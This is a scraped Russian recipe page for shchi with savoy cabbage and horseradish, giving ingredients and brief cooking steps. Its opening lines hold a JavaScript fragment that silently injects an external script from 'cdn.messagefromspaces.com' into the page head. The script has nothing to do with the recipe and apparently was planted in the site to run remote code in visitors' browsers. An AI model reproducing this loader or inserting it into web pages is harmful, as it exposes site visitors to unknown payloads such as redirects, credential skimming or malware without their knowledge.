, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Щи из савойской капусты с хренком


finalЩи — название не такое романтическое, как Суп Вишуаз. Однако, полная кастрюля из пяти литров улетает у нас обычно за 5 минут. Очень рекомендую попробовать!

Чего и сколько берем:

1. Репа — 1 штучка

2. Лук репчатый — 1 штучка

3. Морковь — 1 штучка

4. Капуста савойская — полкачанчика (маленького)

5. Вино белое сухое — 50 мл

6. Хрен острый — 2 ст. ложки

7. Соль по вкусу

8. Чеснок — 2 зубка

9. Зелень любая

10. Вода около 2.5 литров

 

Начинаем готовить:

Репу и морковь трем на терке и пассируем вместе с луком минут 5. Добавляем вино и немножко пропариваем, минуты 3-4. Затем, все это выкладываем в кипящую, подсоленную воду воду и, практически сразу, кладем капусту. Минуту даем покипеть и выключаем. Добавляем хрен, чеснок и зелень. Вот и все! Быстро и вкусно. Главное — не переварить!

На эту тему вы можете почитать:

Борщ "Новый взгляд"
Суп из свежего шпината
Фасолевый суп

Тэги: ,



Добавить комментарий